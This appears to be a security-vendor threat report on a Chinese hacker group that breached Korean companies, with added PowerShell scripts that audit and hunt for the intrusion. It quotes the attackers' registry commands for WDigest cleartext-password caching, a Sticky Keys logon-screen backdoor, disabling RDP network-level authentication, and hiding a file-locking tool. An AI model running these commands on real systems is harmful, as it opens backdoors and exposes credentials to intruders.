Chinese Hacker Group Stealing Information From Korean Companies
Recently, there have been frequent attacks targeting vulnerable, externally accessible servers such as MS-SQL servers and IIS web servers.
The team has confirmed two affected companies in this case: a semiconductor company and a smart manufacturing company that uses artificial intelligence. The threat group behind the attack is believed to be a Chinese hacker group, in the same vein as Xiaoqiying and Dalbit, because a Chinese-language text file with instructions on how to use the hacking tool was found on the compromised systems.
Chinese Hacker Group’s Guideline
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "\"c:\windows\system32\cmd.exe\" /z" /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
!! 禁止强制名 [garbled in the source; probably "disable forced signing"]; run cmd as administrator and execute the following commands
Win2012 Can: \Easy File Locker (!!! Note: only grant the Access permission, nothing else is needed, be sure of this)
Delete 1. REG delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Easy file Locker" /f
C:/Users/Public/Documents/EFL/rule.ini (the settings for the hidden items are in here)
cmd.exe /c reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
1. reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f (configure port 3389)
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "\"c:\windows\system32\cmd.exe\" /z" /f
Table 1. Text file containing the guideline for the hacking tool used by the hacker group
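The commands in Table 1 prepare a compromised server for long-term remote access: `UseLogonCredential=1` makes WDigest keep cleartext passwords in LSASS memory so they can be dumped later, the IFEO `Debugger` value for `sethc.exe` turns the Sticky Keys prompt on the logon screen into a SYSTEM command shell, `UserAuthentication=0` and `SecurityLayer=0` switch off Network Level Authentication and the TLS security layer for RDP, the port is pinned back to 3389, and the Easy File Locker uninstall entry is deleted so the tool no longer appears in Programs and Features. The following script is an added example, not part of the original post or the attackers' tooling: it audits a host for exactly these settings and, with `-Fix`, reverts them. Checking the other accessibility binaries besides `sethc.exe` is an assumption that goes beyond the guideline (the same IFEO trick works for any of them).

```powershell
# Added example, not from the ASEC post: audit a Windows host for the settings
# configured by the recovered guideline, and optionally revert them.
# Run from an elevated PowerShell prompt; pass -Fix to restore safe values.
[CmdletBinding()]
param([switch]$Fix)

$rdp      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
$ifeo     = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$eflKey   = 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Easy file Locker'
$eflRules = 'C:\Users\Public\Documents\EFL\rule.ini'   # path named in the guideline

# Each entry: registry path, value name, the value the attacker sets, the safe value, and why it matters.
$checks = @(
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
       Name = 'UseLogonCredential'; Bad = 1; Safe = 0
       Why  = 'WDigest keeps cleartext passwords in LSASS memory (credential dumping)' },
    @{ Path = $rdp; Name = 'UserAuthentication'; Bad = 0; Safe = 1
       Why  = 'Network Level Authentication disabled: logon screen reachable before authentication' },
    @{ Path = $rdp; Name = 'SecurityLayer'; Bad = 0; Safe = 2
       Why  = 'legacy RDP security layer instead of TLS' }
)

$findings = @()
foreach ($c in $checks) {
    $cur = (Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
    if ($cur -eq $c.Bad) {
        $findings += "[!] $($c.Path)\$($c.Name) = $cur : $($c.Why)"
        if ($Fix) { Set-ItemProperty -Path $c.Path -Name $c.Name -Value $c.Safe -Type DWord }
    }
}

# Sticky Keys style backdoor: a Debugger value under IFEO for an accessibility binary
# runs that program (cmd.exe in the guideline) as SYSTEM from the logon screen.
# Assumption: the guideline only touches sethc.exe; the other names are the usual targets.
foreach ($exe in 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe', 'magnify.exe', 'displayswitch.exe') {
    $dbg = (Get-ItemProperty -Path "$ifeo\$exe" -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) {
        $findings += "[!] IFEO Debugger for $exe -> $dbg (logon-screen backdoor)"
        if ($Fix) { Remove-ItemProperty -Path "$ifeo\$exe" -Name Debugger }
    }
}

# RDP listening port: the guideline resets it to 3389, so report it whatever the value.
$port = (Get-ItemProperty -Path $rdp -Name PortNumber -ErrorAction SilentlyContinue).PortNumber
$findings += "[i] RDP-Tcp PortNumber = $port"

# Easy File Locker: the guideline deletes the uninstall entry to hide the tool, so the
# rule file it names is the better indicator than the uninstall key alone.
if (Test-Path -LiteralPath $eflRules) { $findings += "[!] Easy File Locker rule file present: $eflRules" }
if (Test-Path -LiteralPath $eflKey)   { $findings += "[i] Easy File Locker uninstall entry present: $eflKey" }

$findings
```

Run it without `-Fix` first and keep the output as evidence before remediating; removing the IFEO value and re-enabling NLA closes the logon-screen shell and the unauthenticated RDP exposure, but the credentials already cached by WDigest should be treated as compromised regardless.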
Threat Actor’s Server and Exfiltrated Information
The servers confirmed to be used by the threat actor are as follows:
FRP Management Server

The threat actor installed an FRP client on the servers of the affected companies. The FRP management page shown in Figure 1 therefore lists the infected hosts on which FRP is installed, together with the proxies (FRP tunnels) the threat actor uses to reach them.
Previous blog posts, including the one on the 'Dalbit' APT group, as well as the AhnLab TIP service's 'Analysis Report on Attack Cases Exploiting Various Remote Control Tools', have covered attack methods that utilize FRP in detail.
Dalbit (m00nlight): Chinese Hacker Group’s APT Attack Campaign
Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies
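Because the FRP client on a victim server is what populates the attacker's management page, finding that client is the quickest way to confirm a compromise like the one described above. The script below is an added example, not code from the original post or from the FRP project: it looks for a running `frpc` process, for services and scheduled tasks that start it, and for configuration files on disk, then prints the server address and the tunnels each configuration exposes. It assumes the client is launched as `frpc.exe -c <config>` with an INI-style configuration (a `[common]` section plus one section per tunnel, the format used by older frp releases); the on-disk sweep also catches a renamed binary, since it keys on the configuration rather than the file name.

```powershell
# Added example, not from the ASEC post: hunt for an FRP client on a Windows host
# and print the tunnels it exposes. Assumes "frpc.exe -c <config>" with an INI config.

function Read-FrpcIni {
    param([string]$Path)
    # Minimal INI reader: returns an ordered map of section -> (key -> value).
    $sections = [ordered]@{}
    $current  = $null
    foreach ($raw in Get-Content -LiteralPath $Path -ErrorAction Stop) {
        $line = $raw.Trim()
        if (-not $line -or $line.StartsWith('#') -or $line.StartsWith(';')) { continue }
        if ($line -match '^\[(.+)\]$') { $current = $Matches[1]; $sections[$current] = @{}; continue }
        if ($current -and $line -match '^([^=]+)=(.*)$') {
            $sections[$current][$Matches[1].Trim()] = $Matches[2].Trim()
        }
    }
    return $sections
}

function Show-FrpcConfig {
    param([string]$Path)
    $cfg = Read-FrpcIni -Path $Path
    if ($cfg.Contains('common')) {
        "    FRP server: {0}:{1}" -f $cfg['common']['server_addr'], $cfg['common']['server_port']
    }
    foreach ($name in @($cfg.Keys)) {
        if ($name -eq 'common') { continue }
        $t = $cfg[$name]
        "    tunnel '{0}': {1} {2}:{3} -> server port {4}" -f $name, $t['type'], $t['local_ip'], $t['local_port'], $t['remote_port']
    }
}

# 1. Running processes started with an frpc command line; pull the config path from "-c".
foreach ($p in Get-CimInstance Win32_Process | Where-Object { $_.CommandLine -match 'frpc' }) {
    "[process] PID $($p.ProcessId): $($p.CommandLine)"
    if ($p.CommandLine -match '-c\s+"?([^"\s]+)"?') {
        $cfgPath = $Matches[1]
        if (-not [IO.Path]::IsPathRooted($cfgPath) -and $p.ExecutablePath) {
            $cfgPath = Join-Path (Split-Path -Parent $p.ExecutablePath) $cfgPath
        }
        if (Test-Path -LiteralPath $cfgPath) { Show-FrpcConfig -Path $cfgPath }
    }
}

# 2. Persistence: services and scheduled tasks that launch frpc.
foreach ($s in Get-CimInstance Win32_Service | Where-Object { $_.PathName -match 'frpc' }) {
    "[service] $($s.Name) ($($s.State)): $($s.PathName)"
}
foreach ($t in Get-ScheduledTask | Where-Object {
        $_.Actions | Where-Object { "$($_.Execute) $($_.Arguments)" -match 'frpc' } }) {
    "[task] $($t.TaskPath)$($t.TaskName)"
}

# 3. Renamed binaries: sweep writable locations for config files carrying FRP's distinctive
# keys (server_addr in INI; serverAddr in the TOML format of newer frp releases).
$dirs = @($env:ProgramData, $env:PUBLIC, $env:TEMP, "$env:SystemRoot\Temp") | Where-Object { $_ }
Get-ChildItem -Path $dirs -Recurse -Include *.ini, *.toml -ErrorAction SilentlyContinue |
    Select-String -Pattern '^\s*(server_addr|serverAddr)\s*=' -List |
    ForEach-Object {
        "[config] $($_.Path)"
        if ($_.Path -like '*.ini') { Show-FrpcConfig -Path $_.Path }
    }
```

A tunnel entry with `local_port = 3389` is the combination to look for alongside the registry changes in Table 1: it publishes the victim's RDP service on the attacker's FRP server, which is why the guideline takes care to pin the port to 3389 and to turn NLA off. The printed `server_addr` is the attacker's infrastructure and belongs in the firewall block list and in the incident report.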
File Server

This server hosts hacking tools such as Cobalt Strike, VPN and remote-control tools, as well as a large number of log files. As shown in Figure 2, the log files are stored in directories named with numbers. The stolen logs contain credentials and network information, along with what appears to be internal material from the companies.


The threat actor's C2 server is still online, and some of the affected companies' information is currently exposed on it. The details are therefore not disclosed here, in order to prevent additional harm.